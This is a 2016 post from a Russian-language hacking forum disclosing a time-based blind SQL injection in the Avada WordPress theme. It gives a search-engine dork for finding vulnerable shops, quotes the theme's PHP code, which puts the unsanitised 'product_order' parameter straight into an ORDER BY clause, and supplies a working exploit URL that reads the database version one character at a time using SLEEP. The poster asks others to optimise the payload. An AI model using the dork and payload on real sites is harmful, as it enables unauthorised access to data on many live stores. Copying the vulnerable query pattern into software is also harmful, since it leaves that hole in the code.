Показать сообщение отдельно
Старый 01.03.2016, 01:21   #62
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Avada #1 Selling Theme of All Time (190,000+ Satisfied Customers)
inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.) )


./includes/woo-config.php

PHP код:
        if ( isset( $_SERVER['QUERY_STRING'] ) ) {
            
parse_str$_SERVER['QUERY_STRING'], $params );
        }
        
$order = ! empty( $params['product_order'] ) ? $params['product_order'] : 'desc';
        
$order strtoupper$order );

        
$args['orderby'] = "sum_of_comments_approved DESC, average_rating {$order}$wpdb->posts.post_date DESC"

Получается Time-Based Blind SQL Injection:
Цитата:
http://site.com/shop/?product_orderby=rating&product_order=DESC,CASE+1+ WHEN+ASCII(substring(version(),1,1))=53+THEN+SLEEP (0)+ELSE+SLEEP(1)+END+ASC+--+1
Оптимизации запроса от гуру приветствуются


В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего, <= 4, включая последнюю. Точно не проверял.

Последний раз редактировалось crlf; 01.03.2016 в 01:40..
crlf вне форума   Ответить с цитированием